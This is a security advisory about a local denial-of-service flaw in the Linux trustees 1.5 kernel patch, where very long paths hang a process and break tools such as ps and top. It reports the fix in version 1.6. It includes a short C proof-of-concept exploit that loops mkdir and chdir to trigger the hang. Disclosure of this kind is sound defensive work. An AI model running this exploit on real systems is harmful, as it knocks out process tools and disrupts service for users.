COMMAND

    trustees

SYSTEMS AFFECTED

    linux trustees 1.5

PROBLEM

    Andrey E. Lerman found the following. Linux trustees is a kernel
    patch which provides Netware-like permissions to Linux. It is not
    in the kernel by default. For more information see the project's
    website at:

        http://www.braysystems.com/linux/trustees.html

    When accessing a file or directory with a very long path, the
    process hangs in an unkillable state. All other processes then
    SEGFAULT when trying to access the unkillable process' /proc
    entry, so system utilities such as ps, w, top, killall and the
    like stop working. Apart from that, the system continues to
    function normally. The only version tested is trustees 1.5 for
    linux 2.2.14, but it seems that other versions of linux trustees
    <1.6 are vulnerable.

    It is not certain that this vulnerability is only a local DoS. It
    may be possible to overwrite the process' structures in the
    kernel, causing privilege elevation. Servers with an open ftp
    incoming directory, nfs or samba shares are at risk too. Exploit:

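    #include <stdio.h>
    #include <stdlib.h>     /* exit() */
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <fcntl.h>
    #include <unistd.h>

    int main(void)
    {
        /* Repeatedly create a subdirectory and descend into it, so the
           path of the current directory keeps growing. The loop ends
           when mkdir() or chdir() fails. */
        while (1) {
            if (mkdir("aaaa", 0777) < 0) {
                perror("mkdir");
                exit(1);
            }
            if (chdir("aaaa") < 0) {
                perror("chdir");
                exit(1);
            }
        }

        return 0;
    }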

SOLUTION

    The only solution is a reboot. This problem is fixed in linux
    trustees 1.6, available for linux 2.2.14 and 2.3.99.